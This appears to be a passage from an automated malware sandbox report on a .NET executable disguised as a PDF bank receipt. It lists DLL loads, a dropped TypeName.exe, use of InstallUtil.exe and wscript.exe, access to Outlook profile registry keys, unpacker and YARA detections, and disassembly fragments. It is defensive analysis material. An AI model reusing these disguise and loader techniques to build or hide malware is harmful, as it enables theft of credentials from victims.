              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic file information: File size 1250816 > 1048576
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x130c00
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052769159.0000000006C90000.00000004.08000000.00040000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000003306000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.000000000341F000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052769159.0000000006C90000.00000004.08000000.00040000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000003306000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.000000000341F000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: e-dekont (72).pdf(#U007e56 KB).exe, RegProcessMock.cs.Net Code: PublishGetter System.AppDomain.Load(byte[])
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, RegProcessMock.cs.Net Code: PublishGetter System.AppDomain.Load(byte[])
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6b60000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.2181644021.000000000309C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2052275949.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2041673043.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTR
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E13AEB pushfd ; iretd 0_2_02E13B21
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E13AD7 push ebx; retf 0_2_02E13ADA
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E106C0 push eax; ret 0_2_02E106FA
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E10720 push eax; ret 0_2_02E1072A
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E10700 push eax; ret 0_2_02E1070A
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E10710 push eax; ret 0_2_02E1071A
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD42A8 push ds; retn 0006h0_2_06AD4392
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD36DB push ss; retn 0006h0_2_06AD36F2
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD36D0 push ss; retn 0006h0_2_06AD36D2
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD9E31 push edx; retn 0006h0_2_06AD9E32
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD9E79 push edx; retn 0006h0_2_06AD9E7A
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD37F1 push ss; retn 0006h0_2_06AD37F2
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD3731 push ss; retn 0006h0_2_06AD3732
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD3711 push ss; retn 0006h0_2_06AD3712
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06ADDCEA push es; retf 0_2_06ADDCE8
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06ADDCDE push es; retf 0_2_06ADDCE8
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD540B push eax; retn 0006h0_2_06AD5419
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06ADFC58 pushfd ; retn 001Ah0_2_06ADFC59
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD9DF7 push ecx; retn 0006h0_2_06AD9DFA
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06ADB5C8 push esp; retn 0006h0_2_06ADB5C9
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD9D69 push ecx; retn 0006h0_2_06AD9D6A
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06ADDD46 push es; iretd 0_2_06ADDD54
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06ADC2AA push es; retf 0_2_06ADC2AC
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD3810 push ss; retn 0006h0_2_06AD3812
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AED27B push esp; ret 0_2_06AED282
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AE4032 push es; retf 0_2_06AE4034
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C3B2C3 push FFFFFF8Bh; iretd 0_2_06C3B2C7
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C3B2AD push FFFFFF8Bh; ret 0_2_06C3B2B0
